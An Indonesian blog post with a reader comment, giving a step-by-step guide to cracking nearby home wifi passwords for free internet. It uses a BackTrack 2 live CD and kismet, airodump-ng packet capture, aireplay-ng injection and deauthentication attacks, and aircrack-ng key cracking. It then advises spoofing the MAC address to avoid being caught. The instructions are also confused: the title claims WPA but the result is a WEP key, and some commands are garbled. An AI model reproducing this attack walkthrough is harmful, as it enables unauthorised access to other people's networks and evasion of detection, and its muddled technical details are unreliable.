Artikel ini adalah untuk membuka wifi yang dipassword dengan WPA biar bisa nebeng internet gratis… :D
Baiklah langsung saja kita persiapkan apa saja yg dibutuhkan :
1. Laptop ( atau PC di rumah utk hacking wifi yg ada disekitar rumah anda ).
2. CD blank untuk membakar cd (ya iyalah).
3. Wireless Card yg bisa diinject (manipulasi-red).
4. Baterai laptop yang cukup.
5. Kismet ato netstumbler (jika ingin aman, Kismet didalam BackTrack 2 sudah komplit).
6. Ngerti linux sedikit aja …
Tahap I :
1. Download dulu ISO BackTrack 2 di http://remote-exploit.org/backtrack_download.html, ato langsung ke tahap II jika udah punya Kismet. Untuk teman-teman di Gorontalo anda bisa mengcopy Back Track 2 dari saya.
2. Bakar ISO nya.
Tahap II :
1. Gunakan CD BackTrack 2 tsb ( Bootable CD ).
2. Klo udah, BT2 alias BackTrack 2 minta username n password. Isi dengan root dgn password Toor
3. Udah.. kita selanjutnya akan masuk GUI. Jika anda penggemar linux, pasti udah tau cara masuk GUI. ketik startx lalu enter.
4. Jika udah, ntar akan muncul KDE desktop. Trus masuk Console.
5. Trus ketik kismet dan tekan enter.
6. Secara otomatis Kismet akan me-load, meng-update dan menampilkan semua akses point yang berada di daerah jaringan tersebut.
7. Setelah itu kita pilih calon target / korban.
8. Ketik : iwconfig wlan0 mode monitor Syntax: iwconfig device_name_here mode command_monitor). Jangan lupa di enter, terus.....
9. Saatnya mengintip :
Syntax: airodump-ng –-ivs_tipe_ekstensi –-write apa aja –-channel jadi perintahnya :
airodump-ng –ivs –write file_name –channel 11 wlan0 .
Perintah tersebut akan memulai monitoring dan mengoleksi packet dari channel yang diinginkan.
10. Langkah selanjutnya adalah injecting …
Syntax: aireplay-ng -3 attack level -b BSSID_router_yg_running –h
attached_computer_to_the_bssid_the_router
wlan0=tipe_device.
aireplay-ng -3 -b 00:16:B6:2E:C3:4E -h 00:14:A5:8A:02:CD wlan0
11. Lalu kita akan melakukan De-authentication attack.
Syntax : Aireplay-ng -0 attack_number wlan0 device_type_of_yours –a
BSSID_router_yg_running wlan0
tipe_device aireplay-ng -0 wl an0 -a 00:16:B6:2E:C3:4E wlan0
12. Selanjutnya ganti direktori ke file apaaja.ivs yang disave tadi. Kemudian eksekusi dengan perintah :
Syntax: aircrack-ng -0 attack_type -n number_of_the_encryption_type(64 or 128) -fudgefactor
2-18 *.cap or
*.ivs aircrack-ng -0 -n 128 -f 4 file_name.ivs
Catatan :
00:16:B6:2E:C3:4E =>> BSSID dari router yg running
00:14:A5:8A:02:CD =>> Computer yang make BSSID ( ditampilkan oleh kismet )
wlan0 =>> device router yg kita gunain.
-0 =>> Jenis serangan
-n =>> tipe enkripsi (64 ato 128)
-fudgefactor =>> isi 2-18
*.cap atau *.ivs =>> ekstensi file yg disave
Akhirnya … binGGOOOOO …. ! . Kita dapetin kunci WEP (hex). Lihat teks berwarna merah
Terus langkah selanjutnya tinggal konek ke SSID ( dari Windows XP kita ). Ganti Mac address n Netbios nya dulu biar gak ketahuan MAC asli kita. Download programnya di www.irongeek.com atau bisa juga pake KMACS (download).
Selamat mencoba hasilnya dech ……..
boleh juga nih di coba
BalasHapus